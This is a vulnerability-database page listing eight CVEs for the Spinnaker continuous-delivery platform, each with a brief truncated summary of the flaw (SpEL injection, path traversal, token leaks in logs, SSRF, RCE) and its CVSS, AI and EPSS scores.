Spinnaker Security Vulnerabilities and Issues — Spinnaker CVE List

LinuxfoundationSpinnaker

8 matches found

CVE•added 2020/12/11 2:10 a.m.•73 views

CVE-2020-9301

CVE-2020-9301 affects Spinnaker before v1.23.4, v1.22.4, and v1.21.5. The issue involves handling of SpEL expressions allowing an authenticated attacker to read and write arbitrary files inside the orca container via HTTP POST requests. Affected component: Spinnaker container/orca handling of SpE...

8.8CVSS7.9AI score0.01504EPSS

CVE•added 2022/01/04 5:25 p.m.•72 views

CVE-2021-39143

Spinnaker path traversal (CVE-2021-39143) arises from TAR extraction in AppEngine deployments, where files are deployed without validating paths, allowing a container to overwrite system files and potentially enable MITM via library wrapper/file injection. Affected component: io.spinnaker.clouddr...

7.1CVSS6.6AI score0.00344EPSS

CVE•added 2023/01/03 8:4 p.m.•66 views

CVE-2022-23506

CVE-2022-23506 affects Spinnaker’s Rosco microservice. Prior to versions 1.29.2, 1.28.4, and 1.27.3, Rosco did not properly mask secrets generated during Packer builds, which could expose AWS credentials in log files. The issue is mitigated in 1.29.2, 1.28.4, and 1.27.3+ fixes. A workaround recom...

7.5CVSS5.8AI score0.00541EPSS

CVE•added 2023/08/28 7:47 p.m.•49 views

CVE-2023-39348

CVE-2023-39348 affects Spinnaker and is caused by log output for GitHub status notifications being set to FULL, potentially exposing GitHub tokens in logs. The issue is limited to users of GitHub Status Notifications and could enable token exposure with elevated access to repositories outside of ...

5.3CVSS4.7AI score0.00324EPSS

CVE•added 2022/01/04 7:20 p.m.•48 views

CVE-2021-43832

CVE-2021-43832 applies to Spinnaker, where improper permissions allow an arbitrary user with gate-endpoint access to create and execute pipelines without authentication. If RBAC is not configured across all accounts/applications, this enables remote execution and deploying resources on any accoun...

10CVSS9.7AI score0.0257EPSS

CVE•added 2026/04/20 8:7 p.m.•20 views

CVE-2026-32613

Spinnaker is affected by a security issue in its use of Spring Expression Language (SPeL) where, in versions prior to 2026.1.0, 2026.0.1, 2025.4.2, and 2025.3.2, the SPeL context was not restricted to trusted classes, allowing FULL JVM access. This enables a user to invoke arbitrary Java classes,...

9.9CVSS5.9AI score0.00553EPSS

CVE•added 2026/01/05 9:14 p.m.•16 views

CVE-2025-61916

Spinnaker (multi-cloud CD platform) is affected by an SSRF vulnerability in versions before 2025.1.6, 2025.2.3, and 2025.3.0. The issue arises from server-side requests that can be triggered by user-supplied URLs through certain artifacts (e.g., GitHub, Bitbucket, GitLab, HTTP) and can be consume...

7.9CVSS6.5AI score0.00155EPSS

CVE•added 2026/04/20 8:0 p.m.•15 views

CVE-2026-32604

CVE-2026-32604 affects Spinnaker before the patched releases 2026.1.0, 2026.0.1, 2025.4.2, and 2025.3.2. The vulnerability arises in clouddriver components when handling gitrepo artifacts, allowing a bad actor to execute arbitrary commands on the pod (RCE) by exploiting improper input handling on...

9.9CVSS6AI score0.00606EPSS